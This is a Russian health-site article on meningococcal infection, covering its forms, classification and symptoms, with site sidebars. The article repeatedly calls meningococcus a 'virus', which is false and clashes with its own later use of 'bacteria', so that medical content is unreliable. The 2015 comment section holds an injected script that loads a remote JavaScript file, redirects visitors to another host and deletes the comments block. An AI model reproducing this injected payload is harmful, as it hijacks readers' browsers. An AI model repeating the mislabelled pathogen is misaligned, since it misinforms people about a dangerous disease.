Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Менингококковая инфекция:...  >>  Менингококковая инфекция: классификация и симптомы
 
Обратная связь
 

Менингококковая инфекция: классификация и симптомы

Размер шрифта
28 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Менингококковая инфекция – это острое инфекционное заболевание, вызываемое менингококком и характеризующееся поражением различных органов. Какие именно органы поражаются, и какими симптомами это сопровождается?

Менингококк (Neisseria meningitidis) – это нестойкий во внешней среде вирус, а его локализация на слизистой оболочке задней стенки носоглотки еще более затрудняет его передачу другому человеку. Возбудитель – вирус менингококковой инфекции. Передается воздушно-капельным путем с капельками слизи при кашле, чихании или разговоре, но только если вы на протяжении длительного времени общаетесь с больным. После болезни организм вырабатывает стойкий иммунитет.

Классификация менингококковой инфекции

Менингококковая инфекция имеет следующие формы.

  • Формы первичной локализации в дыхательных путях:

- носительство;
- острый назофарингит;
- пневмония.

  • Гематогенно-генерализованные формы:

- менингококцемия (типичная; молниеносная или хроническая);
- менингит;
- менингоэнцефалит;
- смешанная форма (менингококцемия и менингит);
- редкие формы (эндокардит, артрит и др).

Симптомы и течение

Сила проявлений заболевания зависит от множества факторов: степени поражения, локализации процесса, свойств вируса и др.

Носительство менингококка. Когда бактерии попадают на слизистую оболочку носоглотки, то в большинстве случаев это не ведет к проявлениям инфекции, и этот процесс называется менингококковым носительством.

Острый менингококковый назофарингит. Иногда в носоглотке появляются явления воспаления и легкие проявления интоксикации, которые длятся в среднем 2-3 дня. Так выражается острый менингококковый назофарингит. В редких случаях эти явления могут быть яркими, с высокой температурой тела и проникновением бактерий в кровь. С этого момента заболевание охватывает либо один орган, либо целую систему.

Менингококковая пневмония. Эта форма встречается крайне редко. Менингококковая пневмония может быть очаговой или долевой, и обычно имеет тяжелое течение.

Менингококцемия. В большинстве случаев менингококцемия, или менингококковый сепсис, развивается после назофарингита, порой на фоне полного здоровья человека. Острое начало заболевания проявляется ознобом и повышением температуры тела, достигающей за несколько часов 40-41 °С, головной болью, неукротимой рвотой, болями в мышцах спины и конечностей, бледностью лица, одышкой, тахикардией, снижением артериального давления.

Важный симптом – появление на теле плотной наощупь сыпи с неправильными очертаниями. Сыпь обычно появляется в первые 5-15 ч заболевания и располагается на ягодицах, нижних конечностях, в подмышечных впадинах, на верхних веках. Элементы сыпи могут сливаться в красные пятна, так называемые геморрагии.

Менингококцемия проявляется кровоизлияниями на конъюнктивах, склерах и слизистой оболочке ротоглотки. При тяжелом течении могут развиться носовые, желудочные, почечные и маточные кровотечения. Тяжелое течение менингококцемии может закончиться летальным исходом, особенно это касается молниеносного течения.

Менингококковый менингит. Менингококковый менингит чаще развивается после назофарингита. Заболевание начинается остро с подъема температуры тела до 40-41 °С и появления резкой мучительной головной боли, неукротимой рвоты, но без тошноты и не связанной с приемом пищи.

Больной человек возбужден, пребывает в эйфории. В первые часы заболевания может наступить расстройство сознания и мышечные судороги. Лицо краснеет, на губах может появиться герпес, отмечается тахикардия, понижение давления и задержка мочеотделения.

Для людей с тяжелой формой при запущенном заболевании характерна вынужденная поза: человек лежит на боку с запрокинутой головой с согнутыми и прижатыми к животу ногами.

У детей грудного возраста можно наблюдать выбухание и напряжение большого родничка и некоторые другие специальные симптомы.

Менингоэнцефалит. При этой форме менингококковой инфекции наблюдается быстрое нарастание психических нарушений, отмечается сонливость, развитие параличей и парезов, а менингеальная симптоматика, которая присуща поражению оболочек мозга (головная боль, понижение давления, неукротимая рвота) выражается слабо.

Смешанная форма. Смешанная форма менингококковой инфекции (менингококцемия и менингит) характеризуется сочетанием симптомов двух заболеваний.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Разрушители иммунитета. Что лишает вас защиты от болезней   Как не заболеть зимой. Перезимуем без таблеток!   Современный выбор для профилактики и лечения гриппа, включая пандемический «свиной» грипп H1N1   Частые ОРВИ у ребёнка. Как быть?  
03 сентября 2012Опасный вирус убивает стафилококк, против которого бессильны лекарства! 24 августа 2012Домашний тест на ВИЧ
 
22 февраля 2012Мед помогает в лечении инфицированных ран 06 февраля 2012Ожирение вызывают инфекции
 

Слайдшоу

1
Ушные инфекции у детей
Что есть, чтобы суставы не болели
Как избавиться от больного горла?

Тесты

Что вы знаете о пневмонии?
Я и моя защита от инфекций
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.